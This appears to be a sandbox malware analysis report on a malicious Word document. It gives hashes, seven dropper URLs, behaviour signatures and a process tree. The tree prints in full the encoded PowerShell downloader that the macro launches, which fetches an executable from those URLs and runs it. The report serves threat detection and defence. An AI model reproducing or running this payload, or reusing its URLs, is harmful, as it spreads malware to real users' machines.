Analysis
-
max time kernel
19s -
max time network
18s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
20-10-2020 12:14
General
-
Target
017787caaa93c6f2e375aaf39734b19acd097e04e64142df1c07b226ed9271d2.doc
-
Size
164KB
-
MD5
ce9549ddd29b944b092bcb2631b5cecc
-
SHA1
79053ad61a4348daaae0dc567f0f9b0adf6a35a6
-
SHA256
017787caaa93c6f2e375aaf39734b19acd097e04e64142df1c07b226ed9271d2
-
SHA512
6e9dc425299965b4d6ded3cacd0e612511250f61cc667449fc126d8caf83b1425a641f446c3f080bd488e0d230f0bad132da0e277a158c45dfffcfcb572f076d
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://wodsuit.com/ram-aisin/7r9/
exe.dropper
http://hoobiq.com/cgi-bin/Xyv/
exe.dropper
http://bomfuturoadesivos.com/gallery_03f59a1cc20096539c7aec1b61d7471a/3e/
exe.dropper
https://vat201.com/calculator/itQ/
exe.dropper
http://vikinggg.com/hydrolysis-of/bY/
exe.dropper
https://mohamedsayed.com/wp-admin/Zt/
exe.dropper
https://hostimpel.com/js/q/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blacklisted process makes network request 1 IoCs
-
Executes dropped EXE 1 IoCs
-
Drops file in System32 directory 1 IoCs
-
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 280 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
Processes
-
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\017787caaa93c6f2e375aaf39734b19acd097e04e64142df1c07b226ed9271d2.doc"1⤵
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exePOwersheLL -ENCOD IAAgAHMAZQB0AC0AdgBBAFIASQBBAEIAbABFACAAIAAoACcAMQBJACcAKwAnADYAdwBlAEwAJwApACAAKAAgAFsAVABZAFAARQBdACgAJwBzACcAKwAnAHkAJwArACcAUwB0AGUAbQAnACsAJwAuAEkAbwAnACsAJwAuAEQAaQAnACsAJwBSAEUAQwBUAE8AcgBZACcAKQAgACAAKQA7ACAAUwBFAHQALQBpAFQAZQBtACAAVgBhAFIAaQBBAGIAbABFADoAOABuAHoAagAgACgAWwBUAHkAcABlAF0AKAAnAFMAeQBzAFQAZQBtAC4AbgBFAFQAJwArACcALgBTAEUAJwArACcAcgAnACsAJwBWACcAKwAnAEkAQwBFAHAAbwBpAG4AdABNAEEAJwArACcAbgBBACcAKwAnAEcARQBSACcAKQAgACkAOwBzAGUAVAAgACAAKAAnAGMAVgAnACsAJwBUADQAMgA3ACcAKQAgACgAWwBUAHkAUABFAF0AKAAnAFMAWQBzAHQAZQBNAC4AJwArACcATgBlAHQALgBTAGUAJwArACcAQwB1AHIASQAnACsAJwBUAHkAcABSAE8AdABPAEMAbwBMACcAKwAnAHQAWQAnACsAJwBQAGUAJwApACAAKQAgADsAIAAkAEMAaABzAGIAOQAwADgAPQAoACcAQgAnACsAJwB2AHIAMgAwAGMANQAnACkAOwAkAEEAdQBoAHcANAB5AHIAPQAkAFYAOABxADgAbgA2AGoAIAArACAAWwBjAGgAYQByAF0AKAA4ADAAIAAtACAAMwA4ACkAIAArACAAJABZAG0AbgB3AGkANgB6ADsAJABaAGUAdAB3AGYAcAB0AD0AKAAnAFgAZAAnACsAJwB4AGcAYwBzAG4AJwApADsAIAAgACgARABpAFIAIAAoACIAdgBBAFIAIgArACIASQBBAGIATAAiACsAIgBFADoAMQBpADYAdwBlACIAKwAiAGwAIgApACkALgB2AEEAbABVAGUAOgA6AGMAcgBFAGEAdABlAEQASQByAGUAYwBUAE8AUgBZACgAJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQAgACsAIAAoACgAJwBJAFQAJwArACcAcQBTACcAKwAnADQAdQB6ADIAdAAnACsAJwBpACcAKwAnAEkAVABxAE0AZABtAG8AJwArACcAOABpAHUASQAnACsAJwBUAHEAJwApAC4AcgBlAFAAbABBAGMAZQAoACgAWwBjAGgAYQByAF0ANwAzACsAWwBjAGgAYQByAF0AOAA0ACsAWwBjAGgAYQByAF0AMQAxADMAKQAsAFsAcwB0AHIASQBOAEcAXQBbAGMAaABhAHIAXQA5ADIAKQApACkAOwAkAEcAdwB1AF8ANAB5AHoAPQAoACcAWQA3AGUAJwArACcAdwAnACsAJwB2AGsAagAnACkAOwAgACAAKABpAHQARQBNACAAIAB2AGEAUgBpAGEAYgBsAGUAOgA4AE4AegBKACAAIAApAC4AdgBBAEwAdQBFADoAOgBzAGUAYwBVAFIAaQB0AFkAUAByAG8AdABvAGMAbwBMACAAPQAgACAAKAAgACAAdgBBAFIASQBhAGIAbABFACAAKAAnAGMAVgAnACsAJwBUADQAMgA3ACcAKQApAC4AVgBhAGwAVQBFADoAOgB0AEwAUwAxADIAOwAkAFcAMQAyADUAdQBpAHYAPQAoACcASgB6AGEAawBoACcAKwAnAGMAdgAnACkAOwAkAEUAZwB6ADcAMQB2AGoAIAA9ACAAKAAnAFoAJwArACcAOQBuAHcAbAAnACsAJwAxADAAJwApADsAJABMAGoAeQBrAGsAOQBnAD0AKAAnAFYAcgBrACcAKwAnAG4AMwB0ADcAJwApADsAJABCAGYAdwBlAHkAcABjAD0AKAAnAEgAMQB4AHgAOQAnACsAJwB5ADcAJwApADsAJABKAGsAbgBmAHoAOQB0AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAHsAMAB9ACcAKwAnAFMAJwArACcANAB1ACcAKwAnAHoAMgB0AGkAewAwAH0ATQBkAG0AbwA4ACcAKwAnAGkAdQB7ADAAfQAnACkAIAAgAC0AZgAgAFsAYwBIAEEAcgBdADkAMgApACsAJABFAGcAegA3ADEAdgBqACsAKAAnAC4AJwArACcAZQB4AGUAJwApADsAJABUAHAAbwBsAHUAawBlAD0AKAAnAE4AbwBxACcAKwAnADIAJwArACcAMwBpAHgAJwApADsAJABNAGgAMgAyAHoAawBvAD0AbgBlAGAAdwAtAG8AYABCAEoARQBjAFQAIABOAGUAVAAuAFcARQBiAEMATABJAEUAbgBUADsAJABaAHgAZwB5AGgAeAA1AD0AKAAnAGgAdAB0AHAAOgAvAC8AJwArACcAdwBvACcAKwAnAGQAcwB1ACcAKwAnAGkAJwArACcAdAAuACcAKwAnAGMAbwBtACcAKwAnAC8AcgBhAG0AJwArACcALQBhAGkAJwArACcAcwBpAG4AJwArACcALwA3ACcAKwAnAHIAOQAnACsAJwAvACoAaAB0ACcAKwAnAHQAcAA6AC8ALwBoACcAKwAnAG8AbwBiAGkAcQAuAGMAbwAnACsAJwBtAC8AYwBnAGkALQAnACsAJwBiAGkAbgAvACcAKwAnAFgAeQB2AC8AKgAnACsAJwBoAHQAJwArACcAdABwADoALwAvAGIAbwAnACsAJwBtAGYAdQB0AHUAcgBvACcAKwAnAGEAZAAnACsAJwBlAHMAaQB2ACcAKwAnAG8AcwAuAGMAJwArACcAbwBtAC8AZwAnACsAJwBhAGwAJwArACcAbABlACcAKwAnAHIAeQBfADAAMwAnACsAJwBmACcAKwAnADUAOQBhADEAYwBjADIAMAAwACcAKwAnADkANgAnACsAJwA1ADMAOQBjADcAYQBlAGMAMQBiADYAJwArACcAMQBkACcAKwAnADcAJwArACcANAA3ACcAKwAnADEAYQAvACcAKwAnADMAZQAvACcAKwAnACoAaAB0AHQAcAAnACsAJwBzACcAKwAnADoALwAnACsAJwAvAHYAYQB0ADIAMAAnACsAJwAxAC4AYwBvAG0ALwBjAGEAbABjAHUAbABhAHQAbwByAC8AaQB0ACcAKwAnAFEALwAqACcAKwAnAGgAdAB0AHAAOgAnACsAJwAvAC8AdgBpAGsAJwArACcAaQAnACsAJwBuACcAKwAnAGcAZwAnACsAJwBnAC4AYwBvAG0ALwBoACcAKwAnAHkAZAByAG8AbAB5AHMAaQAnACsAJwBzAC0AJwArACcAbwBmAC8AYgBZAC8AJwArACcAKgBoAHQAJwArACcAdABwAHMAOgAvACcAKwAnAC8AbQBvAGgAYQBtAGUAZAAnACsAJwBzAGEAJwArACcAeQBlAGQALgBjAG8AJwArACcAbQAvAHcAcAAtAGEAZAAnACsAJwBtAGkAJwArACcAbgAvAFoAdAAvACoAJwArACcAaAB0ACcAKwAnAHQAcABzADoAJwArACcALwAnACsAJwAvAGgAbwBzACcAKwAnAHQAJwArACcAaQBtAHAAZQAnACsAJwBsAC4AYwBvAG0AJwArACcALwBqAHMALwBxAC8AJwApAC4AUwBQAGwAaQB0ACgAJABDAGwAdQBmAGQANgB5ACAAKwAgACQAQQB1AGgAdwA0AHkAcgAgACsAIAAkAEYANABfAHYAbAB0AHoAKQA7ACQAUABlAHcAbQBlAHUAcwA9ACgAJwBBAGYAJwArACcAdwBrAF8AJwArACcAbABkACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAQgBsAGYAcgBrAGcAegAgAGkAbgAgACQAWgB4AGcAeQBoAHgANQApAHsAdAByAHkAewAkAE0AaAAyADIAegBrAG8ALgBEAG8AdwBuAGwAbwBBAEQARgBpAGwAZQAoACQAQgBsAGYAcgBrAGcAegAsACAAJABKAGsAbgBmAHoAOQB0ACkAOwAkAEIAZwB1AHgAZAAxAGQAPQAoACcAVQAnACsAJwBvAGQAMwBsACcAKwAnAHQAZgAnACkAOwBJAGYAIAAoACgAZwBFAFQALQBpAGAAVABgAGUATQAgACQASgBrAG4AZgB6ADkAdAApAC4AbABlAG4ARwBUAGgAIAAtAGcAZQAgADMAOQA4ADkANgApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AKAAnAHcAaQBuACcAKwAnADMAMgBfACcAKwAnAFAAcgAnACsAJwBvAGMAZQBzAHMAJwApACkALgBDAHIARQBBAHQAZQAoACQASgBrAG4AZgB6ADkAdAApADsAJABHAGYAeQB3AGwAbABzAD0AKAAnAFYAZgAnACsAJwAwACcAKwAnAGoAbwBiADcAJwApADsAYgByAGUAYQBrADsAJABYAHQAZQAwAGMAZAA3AD0AKAAnAFMAdgAnACsAJwAyACcAKwAnAHIAMgBxAHMAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABQAHUAMgBnAHAAcgAyAD0AKAAnAEIAJwArACcANQBrAHYAJwArACcAZQB4AG8AJwApAA==1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\S4uz2ti\Mdmo8iu\Z9nwl10.exeC:\Users\Admin\S4uz2ti\Mdmo8iu\Z9nwl10.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\S4uz2ti\Mdmo8iu\Z9nwl10.exeMD5
ce236932460114b0645dfeb9677cc957
SHA1d885ed4f79b5a64242f8e19856dfac453cf23e23
SHA2564575530915ac207d1d1090b995232b5934b48149ac0dd5cdaa2deb76ae1e1ad8
SHA512c468c962c71467c17f5681655856b9ca2245f9197c49c3c32b5a025c9033077be78fd38c46a7fb89daac799980c65d026b4e44bfde42f9447ae09aaae4fe5aff
-
memory/1184-2-0x0000000008B20000-0x0000000008B24000-memory.dmpFilesize
16KB
-
memory/1184-4-0x0000000006EF0000-0x00000000070F0000-memory.dmpFilesize
2.0MB
-
memory/1580-7-0x000007FEE9250000-0x000007FEE9C3C000-memory.dmpFilesize
9.9MB
-
memory/1580-8-0x0000000002390000-0x0000000002391000-memory.dmpFilesize
4KB
-
memory/1580-9-0x000000001AD20000-0x000000001AD21000-memory.dmpFilesize
4KB
-
memory/1580-10-0x0000000002470000-0x0000000002471000-memory.dmpFilesize
4KB
-
memory/1580-11-0x0000000001F90000-0x0000000001F91000-memory.dmpFilesize
4KB
-
memory/1580-12-0x000000001C230000-0x000000001C231000-memory.dmpFilesize
4KB
-
memory/1580-13-0x000000001AB00000-0x000000001AB01000-memory.dmpFilesize
4KB